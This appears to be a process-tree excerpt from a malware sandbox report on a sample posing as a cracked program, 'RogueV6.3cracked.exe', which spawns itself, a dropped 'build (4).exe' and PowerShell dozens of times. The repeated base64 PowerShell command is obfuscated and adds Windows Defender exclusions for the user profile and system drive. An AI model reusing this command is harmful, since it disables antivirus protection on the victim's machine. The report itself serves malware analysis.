C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"11⤵
- Executes dropped EXE
PID:4996
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"11⤵PID:1812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"12⤵
- Executes dropped EXE
PID:1912
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"12⤵PID:1604
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"13⤵
- Executes dropped EXE
PID:1852
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"13⤵PID:3172
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"14⤵
- Executes dropped EXE
PID:1188
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"14⤵PID:3548
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"15⤵
- Executes dropped EXE
PID:4392
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"15⤵PID:2356
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="16⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"16⤵
- Executes dropped EXE
PID:664
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"16⤵PID:3132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="17⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5276
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"17⤵
- Executes dropped EXE
PID:5284
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"17⤵
- System Location Discovery: System Language Discovery
PID:5304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="18⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5532
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"18⤵
- Executes dropped EXE
PID:5540
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"18⤵PID:5568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="19⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"19⤵
- Executes dropped EXE
PID:5772
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"19⤵PID:5892
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="20⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6088
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"20⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6096
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"20⤵PID:6104
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="21⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5324
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"21⤵
- Executes dropped EXE
PID:5068
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"21⤵PID:1984
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"22⤵
- Executes dropped EXE
PID:4864
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"22⤵PID:1456
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5572
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"23⤵
- Executes dropped EXE
PID:5948
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"23⤵PID:1372
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5196
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"24⤵
- Executes dropped EXE
PID:1628
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"24⤵PID:6020
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="25⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"25⤵
- Executes dropped EXE
PID:5552
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"25⤵PID:2752
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="26⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"26⤵
- Executes dropped EXE
PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"26⤵PID:2812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="27⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"27⤵
- Executes dropped EXE
PID:5168
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"27⤵PID:2568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="28⤵
- Suspicious use of AdjustPrivilegeToken
PID:5160
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"28⤵
- Executes dropped EXE
PID:3020
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"28⤵PID:3656
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="29⤵
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"29⤵
- Executes dropped EXE
PID:784
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"29⤵PID:6068
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="30⤵
- Suspicious use of AdjustPrivilegeToken
PID:6196
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"30⤵
- Executes dropped EXE
PID:6216
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"30⤵PID:6300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="31⤵
- Suspicious use of AdjustPrivilegeToken
PID:6488
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"31⤵
- Executes dropped EXE
PID:6512
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"31⤵PID:6560
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="32⤵
- Suspicious use of AdjustPrivilegeToken
PID:6712
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"32⤵
- Executes dropped EXE
PID:6720
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"32⤵
- System Location Discovery: System Language Discovery
PID:6772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="33⤵
- Suspicious use of AdjustPrivilegeToken
PID:6948
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"33⤵
- Executes dropped EXE
PID:6960
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"33⤵PID:7000
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="34⤵
- Suspicious use of AdjustPrivilegeToken
PID:7128
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"34⤵
- Executes dropped EXE
PID:7136
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"34⤵PID:7160
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="35⤵
- Suspicious use of AdjustPrivilegeToken
PID:6152
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"35⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6156
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"35⤵PID:420
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="36⤵
- Suspicious use of AdjustPrivilegeToken
PID:6620
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"36⤵
- Executes dropped EXE
PID:6624
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"36⤵
- System Location Discovery: System Language Discovery
PID:6792 -
